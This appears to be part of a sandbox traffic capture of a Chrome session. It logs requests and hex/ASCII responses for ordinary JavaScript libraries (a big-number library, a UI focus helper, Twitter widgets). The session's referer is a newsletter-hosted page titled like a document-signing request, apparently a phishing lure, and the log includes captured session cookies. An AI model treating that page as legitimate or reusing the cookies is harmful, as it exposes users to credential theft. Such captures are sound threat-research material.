                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 73 75 70 65 72 5f 3d 74 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 2e 70 72 6f 74 6f 74 79 70 65 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2c 65 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 65 77 20 72 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 65 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 32 35 29 2c 69 3d 6e 2e 42 75 66 66 65 72 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 74 5b 72 5d 3d 65 5b 72 5d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 69 28 65 2c 74 2c 72 29 7d 69 2e 66 72 6f 6d 26 26 69 2e 61 6c 6c 6f 63 26 26 69 2e 61 6c 6c 6f
                                                                                                                                            Data Ascii: rts=function(e,t){e.super_=t;var r=function(){};r.prototype=t.prototype,e.prototype=new r,e.prototype.constructor=e}},function(e,t,r){var n=r(25),i=n.Buffer;function o(e,t){for(var r in e)t[r]=e[r]}function a(e,t,r){return i(e,t,r)}i.from&&i.alloc&&i.allo
                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 2c 65 7d 2c 61 73 79 6e 63 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 63 61 6c 6c 28 74 7c 7c 6e 75 6c 6c 29 7d 2c 30 29 7d 2c 63 6f 6d 70 61 63 74 3a 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 69 28 74 2c 66 75 6e 63 74 69 6f 6e 28 72 2c 6e 29 7b 61 28 6e 29 26 26 28 65 28 6e 29 2c 66 28 6e 29 26 26 64 65 6c 65 74 65 20 74 5b 72 5d 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 26 26 6e 75 6c 6c 21 3d 3d 6e 26 26 22 22 21 3d 3d 6e 7c 7c 64 65 6c 65 74 65 20 74 5b 72 5d 7d 29 2c 74 7d 2c 63 6f 6e 74 61 69 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 28 21 65 7c 7c 21 65 2e 69 6e 64 65 78 4f 66 29 26 26 65 2e 69 6e 64 65 78 4f 66 28 74 29 3e
                                                                                                                                            Data Ascii: ,e},async:function(e,t){n.setTimeout(function(){e.call(t||null)},0)},compact:function e(t){return i(t,function(r,n){a(n)&&(e(n),f(n)&&delete t[r]),void 0!==n&&null!==n&&""!==n||delete t[r]}),t},contains:function(e,t){return!(!e||!e.indexOf)&&e.indexOf(t)>
                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 6d 70 28 74 29 3c 30 3f 65 3a 74 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 6e 69 74 4e 75 6d 62 65 72 28 65 2c 74 2c 72 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 6e 69 74 41 72 72 61 79 28 65 2c 74 2c 72 29 3b 22 68 65 78 22 3d 3d 3d 74 26 26 28 74 3d 31 36 29 2c 6e 28 74 3d 3d 3d 28 30 7c 74 29 26 26 74 3e 3d 32 26 26 74 3c 3d 33 36 29 3b 76 61 72 20 69 3d 30 3b 22 2d 22 3d 3d 3d 28 65 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 2f 5c 73 2b 2f 67 2c 22
                                                                                                                                            Data Ascii: t){return e.cmp(t)<0?e:t},o.prototype._init=function(e,t,r){if("number"==typeof e)return this._initNumber(e,t,r);if("object"==typeof e)return this._initArray(e,t,r);"hex"===t&&(t=16),n(t===(0|t)&&t>=2&&t<=36);var i=0;"-"===(e=e.toString().replace(/\s+/g,"
                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 68 2e 63 65 69 6c 28 28 65 2e 6c 65 6e 67 74 68 2d 74 29 2f 36 29 2c 74 68 69 73 2e 77 6f 72 64 73 3d 6e 65 77 20 41 72 72 61 79 28 74 68 69 73 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 68 69 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 74 68 69 73 2e 77 6f 72 64 73 5b 72 5d 3d 30 3b 76 61 72 20 6e 2c 69 2c 6f 3d 30 3b 66 6f 72 28 72 3d 65 2e 6c 65 6e 67 74 68 2d 36 2c 6e 3d 30 3b 72 3e 3d 74 3b 72 2d 3d 36 29 69 3d 66 28 65 2c 72 2c 72 2b 36 29 2c 74 68 69 73 2e 77 6f 72 64 73 5b 6e 5d 7c 3d 69 3c 3c 6f 26 36 37 31 30 38 38 36 33 2c 74 68 69 73 2e 77 6f 72 64 73 5b 6e 2b 31 5d 7c 3d 69 3e 3e 3e 32 36 2d 6f 26 34 31 39 34 33 30 33 2c 28 6f 2b 3d 32 34 29 3e 3d 32 36 26 26 28 6f 2d 3d 32 36 2c 6e 2b 2b 29 3b 72 2b 36 21 3d 3d 74 26
                                                                                                                                            Data Ascii: h.ceil((e.length-t)/6),this.words=new Array(this.length);for(var r=0;r<this.length;r++)this.words[r]=0;var n,i,o=0;for(r=e.length-6,n=0;r>=t;r-=6)i=f(e,r,r+6),this.words[n]|=i<<o&67108863,this.words[n+1]|=i>>>26-o&4194303,(o+=24)>=26&&(o-=26,n++);r+6!==t&
                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 6f 53 74 72 69 6e 67 28 31 36 29 2b 22 3e 22 7d 3b 76 61 72 20 63 3d 5b 22 22 2c 22 30 22 2c 22 30 30 22 2c 22 30 30 30 22 2c 22 30 30 30 30 22 2c 22 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 30 30
                                                                                                                                            Data Ascii: oString(16)+">"};var c=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","00
                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 7b 76 61 72 20 66 3d 74 68 69 73 2e 77 6f 72 64 73 5b 61 5d 2c 73 3d 28 31 36 37 37 37 32 31 35 26 28 66 3c 3c 69 7c 6f 29 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 72 3d 30 21 3d 3d 28 6f 3d 66 3e 3e 3e 32 34 2d 69 26 31 36 37 37 37 32 31 35 29 7c 7c 61 21 3d 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2d 31 3f 63 5b 36 2d 73 2e 6c 65 6e 67 74 68 5d 2b 73 2b 72 3a 73 2b 72 2c 28 69 2b 3d 32 29 3e 3d 32 36 26 26 28 69 2d 3d 32 36 2c 61 2d 2d 29 7d 66 6f 72 28 30 21 3d 3d 6f 26 26 28 72 3d 6f 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2b 72 29 3b 72 2e 6c 65 6e 67 74 68 25 74 21 3d 30 3b 29 72 3d 22 30 22 2b 72 3b 72 65 74 75 72 6e 20 30 21 3d 3d 74 68 69 73 2e 6e 65 67 61 74 69 76 65 26 26 28 72 3d 22 2d 22 2b 72 29 2c 72 7d 69 66 28 65 3d 3d 3d 28 30 7c 65 29 26
                                                                                                                                            Data Ascii: {var f=this.words[a],s=(16777215&(f<<i|o)).toString(16);r=0!==(o=f>>>24-i&16777215)||a!==this.length-1?c[6-s.length]+s+r:s+r,(i+=2)>=26&&(i-=26,a--)}for(0!==o&&(r=o.toString(16)+r);r.length%t!=0;)r="0"+r;return 0!==this.negative&&(r="-"+r),r}if(e===(0|e)&
                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 5a 65 72 6f 28 29 3b 66 2b 2b 29 61 3d 68 2e 61 6e 64 6c 6e 28 32 35 35 29 2c 68 2e 69 75 73 68 72 6e 28 38 29 2c 63 5b 6f 2d 66 2d 31 5d 3d 61 7d 72 65 74 75 72 6e 20 63 7d 2c 4d 61 74 68 2e 63 6c 7a 33 32 3f 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 63 6f 75 6e 74 42 69 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 33 32 2d 4d 61 74 68 2e 63 6c 7a 33 32 28 65 29 7d 3a 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 63 6f 75 6e 74 42 69 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2c 72 3d 30 3b 72 65 74 75 72 6e 20 74 3e 3d 34 30 39 36 26 26 28 72 2b 3d 31 33 2c 74 3e 3e 3e 3d 31 33 29 2c 74 3e 3d 36 34 26 26 28 72 2b 3d 37 2c 74 3e 3e 3e 3d 37 29 2c 74 3e 3d 38 26 26 28 72 2b 3d 34 2c 74 3e 3e 3e 3d 34 29 2c 74 3e 3d 32 26
                                                                                                                                            Data Ascii: Zero();f++)a=h.andln(255),h.iushrn(8),c[o-f-1]=a}return c},Math.clz32?o.prototype._countBits=function(e){return 32-Math.clz32(e)}:o.prototype._countBits=function(e){var t=e,r=0;return t>=4096&&(r+=13,t>>>=13),t>=64&&(r+=7,t>>>=7),t>=8&&(r+=4,t>>>=4),t>=2&
                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 70 65 2e 69 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 30 3d 3d 28 74 68 69 73 2e 6e 65 67 61 74 69 76 65 7c 65 2e 6e 65 67 61 74 69 76 65 29 29 2c 74 68 69 73 2e 69 75 6f 72 28 65 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 65 6e 67 74 68 3e 65 2e 6c 65 6e 67 74 68 3f 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2e 69 6f 72 28 65 29 3a 65 2e 63 6c 6f 6e 65 28 29 2e 69 6f 72 28 74 68 69 73 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 75 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 65 6e 67 74 68 3e 65 2e 6c 65 6e 67 74 68 3f 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2e 69 75 6f 72 28 65 29 3a 65 2e 63 6c 6f 6e 65 28 29
                                                                                                                                            Data Ascii: pe.ior=function(e){return n(0==(this.negative|e.negative)),this.iuor(e)},o.prototype.or=function(e){return this.length>e.length?this.clone().ior(e):e.clone().ior(this)},o.prototype.uor=function(e){return this.length>e.length?this.clone().iuor(e):e.clone()
                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 61 72 20 69 3d 30 3b 69 3c 74 3b 69 2b 2b 29 74 68 69 73 2e 77 6f 72 64 73 5b 69 5d 3d 36 37 31 30 38 38 36 33 26 7e 74 68 69 73 2e 77 6f 72 64 73 5b 69 5d 3b 72 65 74 75 72 6e 20 72 3e 30 26 26 28 74 68 69 73 2e 77 6f 72 64 73 5b 69 5d 3d 7e 74 68 69 73 2e 77 6f 72 64 73 5b 69 5d 26 36 37 31 30 38 38 36 33 3e 3e 32 36 2d 72 29 2c 74 68 69 73 2e 73 74 72 69 70 28 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 6f 74 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2e 69 6e 6f 74 6e 28 65 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 3e 3d 30 29 3b 76 61 72 20 72 3d 65 2f 32 36 7c 30
                                                                                                                                            Data Ascii: ar i=0;i<t;i++)this.words[i]=67108863&~this.words[i];return r>0&&(this.words[i]=~this.words[i]&67108863>>26-r),this.strip()},o.prototype.notn=function(e){return this.clone().inotn(e)},o.prototype.setn=function(e,t){n("number"==typeof e&&e>=0);var r=e/26|0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            39192.168.2.1649755104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC849OUTGET /assets/use-is-mounted-BaHv16bB.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3599
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"e0f-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4161
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a25d324350-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 62 32 34 39 30 38 65 2d 61 66 36 34 2d 35 37 37 31 2d 38 33 36 37 2d 31 63 34 38 39 30 66 64 35 39 34 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5b24908e-af64-5771-8367-1c4890fd594e")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 72 6f 70 65 72 74 79 28 22 63 75 72 72 65 6e 74 22 29 26 26 65 2e 63 75 72 72 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 3f 65 2e 63 75 72 72 65 6e 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3a 64 6f 63 75 6d 65 6e 74 7d 6c 65 74 20 64 3d 5b 22 5b 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 3d 74 72 75 65 5d 22 2c 22 5b 74 61 62 69 6e 64 65 78 5d 22 2c 22 61 5b 68 72 65 66 5d 22 2c 22 61 72 65 61 5b 68 72 65 66 5d 22 2c 22 62 75 74 74 6f 6e 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 22 2c 22 69 66 72 61 6d 65 22 2c 22 69 6e 70 75 74 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 22 2c 22 73 65 6c 65 63 74 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 22 2c 22 74 65 78 74 61 72 65 61 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29
                                                                                                                                            Data Ascii: roperty("current")&&e.current instanceof Node?e.current.ownerDocument:document}let d=["[contentEditable=true]","[tabindex]","a[href]","area[href]","button:not([disabled])","iframe","input:not([disabled])","select:not([disabled])","textarea:not([disabled])
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 74 2e 64 61 74 61 73 65 74 2e 68 65 61 64 6c 65 73 73 75 69 46 6f 63 75 73 56 69 73 69 62 6c 65 3d 22 22 29 7d 2c 21 30 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 64 65 74 61 69 6c 3d 3d 3d 31 3f 64 65 6c 65 74 65 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 61 74 61 73 65 74 2e 68 65 61 64 6c 65 73 73 75 69 46 6f 63 75 73 56 69 73 69 62 6c 65 3a 65 2e 64 65 74 61 69 6c 3d 3d 3d 30 26 26 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 61 74 61 73 65 74 2e 68 65 61 64 6c 65 73 73 75 69 46 6f 63 75 73 56 69 73 69 62 6c 65 3d 22 22 29 7d 2c 21 30 29 29 3b 66 75 6e 63 74 69 6f 6e 20 49 28 65 29 7b 65 3f 2e 66
                                                                                                                                            Data Ascii: t.dataset.headlessuiFocusVisible="")},!0),document.addEventListener("click",e=>{e.detail===1?delete document.documentElement.dataset.headlessuiFocusVisible:e.detail===0&&(document.documentElement.dataset.headlessuiFocusVisible="")},!0));function I(e){e?.f
                                                                                                                                            2025-01-15 18:14:34 UTC404INData Raw: 29 25 61 3b 65 6c 73 65 7b 69 66 28 75 3c 30 29 72 65 74 75 72 6e 20 33 3b 69 66 28 75 3e 3d 61 29 72 65 74 75 72 6e 20 31 7d 69 3d 6f 5b 75 5d 2c 69 3f 2e 66 6f 63 75 73 28 4e 29 2c 63 2b 3d 45 7d 77 68 69 6c 65 28 69 21 3d 3d 73 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 29 3b 72 65 74 75 72 6e 20 74 26 36 26 26 4c 28 69 29 26 26 69 2e 73 65 6c 65 63 74 28 29 2c 32 7d 66 75 6e 63 74 69 6f 6e 20 52 28 29 7b 6c 65 74 20 65 3d 70 2e 75 73 65 52 65 66 28 21 31 29 3b 72 65 74 75 72 6e 20 46 28 28 29 3d 3e 28 65 2e 63 75 72 72 65 6e 74 3d 21 30 2c 28 29 3d 3e 7b 65 2e 63 75 72 72 65 6e 74 3d 21 31 7d 29 2c 5b 5d 29 2c 65 7d 65 78 70 6f 72 74 7b 4b 20 61 73 20 44 2c 44 20 61 73 20 49 2c 77 20 61 73 20 4d 2c 79 20 61 73 20 4e 2c 54 20 61 73 20 4f 2c 4f 20 61 73
                                                                                                                                            Data Ascii: )%a;else{if(u<0)return 3;if(u>=a)return 1}i=o[u],i?.focus(N),c+=E}while(i!==s.activeElement);return t&6&&L(i)&&i.select(),2}function R(){let e=p.useRef(!1);return F(()=>(e.current=!0,()=>{e.current=!1}),[]),e}export{K as D,D as I,w as M,y as N,T as O,O as


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            40192.168.2.1649752146.75.120.1574436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC354OUTGET /widgets.js HTTP/1.1
                                                                                                                                            Host: platform.twitter.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2025-01-15 18:14:34 UTC615INHTTP/1.1 200 OK
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 93065
                                                                                                                                            Last-Modified: Mon, 11 Dec 2023 17:20:28 GMT
                                                                                                                                            ETag: "824beb891744db98ccbd3a456e59e0f7"
                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                            Cache-Control: public, max-age=1800
                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                            Access-Control-Allow-Methods: GET
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            X-Served-By: cache-iad-kcgs7200137-IAD, cache-fra-etou8220038-FRA
                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            TW-CDN: FT
                                                                                                                                            2025-01-15 18:14:34 UTC16384INData Raw: 46 75 6e 63 74 69 6f 6e 26 26 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 26 26 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 26 26 28 2f 28 4d 53 49 45 20 28 5b 36 37 38 39 5d 7c 31 30 7c 31 31 29 29 7c 54 72 69 64 65 6e 74 2f 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 7c 7c 28 77 69 6e 64 6f 77 2e 5f 5f 74 77 74 74 72 26 26 77 69 6e 64 6f 77 2e 5f 5f 74 77 74 74 72 2e 77 69 64 67 65 74 73 26 26 77 69 6e 64 6f 77 2e 5f 5f 74 77 74 74 72 2e 77 69 64 67 65 74 73 2e 6c 6f 61 64 65 64 26 26 77 69 6e 64 6f 77 2e 74 77 74 74 72 2e 77 69 64 67 65 74 73 2e 6c 6f 61 64 26 26 77 69 6e 64 6f 77 2e 74 77 74 74 72 2e 77 69 64 67 65 74 73 2e 6c 6f 61 64 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 74 77 74 74
                                                                                                                                            Data Ascii: Function&&Function.prototype&&Function.prototype.bind&&(/(MSIE ([6789]|10|11))|Trident/.test(navigator.userAgent)||(window.__twttr&&window.__twttr.widgets&&window.__twttr.widgets.loaded&&window.twttr.widgets.load&&window.twttr.widgets.load(),window.__twtt
                                                                                                                                            2025-01-15 18:14:34 UTC16384INData Raw: 65 29 29 2c 68 28 6f 2c 6e 29 2b 22 2e 68 74 6d 6c 22 29 7d 2c 65 6d 62 65 64 53 65 72 76 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 7c 7c 5b 5d 2c 6e 3d 6f 3b 72 65 74 75 72 6e 20 65 2e 75 6e 73 68 69 66 74 28 22 73 72 76 22 29 2c 68 28 6e 2c 65 29 7d 2c 65 76 65 6e 74 56 69 64 65 6f 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 65 2e 75 6e 73 68 69 66 74 28 22 76 69 64 65 6f 2f 65 76 65 6e 74 22 29 2c 68 28 66 28 29 2c 65 29 7d 2c 67 72 69 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 65 2e 75 6e 73 68 69 66 74 28 22 67 72 69 64 2f 63 6f 6c 6c 65 63 74 69 6f 6e 22 29 2c 68 28 66 28 29 2c 65 29 7d 2c 6d 6f 6d 65 6e 74 3a 66 75
                                                                                                                                            Data Ascii: e)),h(o,n)+".html")},embedService:function(t){var e=t||[],n=o;return e.unshift("srv"),h(n,e)},eventVideo:function(t){var e=t||[];return e.unshift("video/event"),h(f(),e)},grid:function(t){var e=t||[];return e.unshift("grid/collection"),h(f(),e)},moment:fu
                                                                                                                                            2025-01-15 18:14:34 UTC16384INData Raw: 6c 76 65 28 29 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 5b 6f 62 6a 65 63 74 20 50 72 6f 6d 69 73 65 5d 22 3d 3d 3d 6e 26 26 21 65 2e 63 61 73 74 29 72 65 74 75 72 6e 7d 74 2e 50 72 6f 6d 69 73 65 3d 55 7d 2c 55 2e 50 72 6f 6d 69 73 65 3d 55 2c 55 7d 2c 74 2e 65 78 70 6f 72 74 73 3d 72 28 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 34 37 29 3b 74 2e 65 78 70 6f 72 74 73 3d 6e 65 77 20 72 28 22 74 77 74 74 72 22 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 31 29 2c 69 3d 6e 28 30 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 72 65 74 75 72 6e 20 69 2e 69 73 54 79 70 65 28 22 73 74 72 69 6e 67 22 2c 74 29 3f 74 2e 73 70 6c 69 74 28 22 2e 22 29 3a 69 2e 69 73 54 79 70 65 28 22
                                                                                                                                            Data Ascii: lve())}catch(t){}if("[object Promise]"===n&&!e.cast)return}t.Promise=U},U.Promise=U,U},t.exports=r()},function(t,e,n){var r=n(47);t.exports=new r("twttr")},function(t,e,n){var r=n(1),i=n(0);function o(t){return i.isType("string",t)?t.split("."):i.isType("
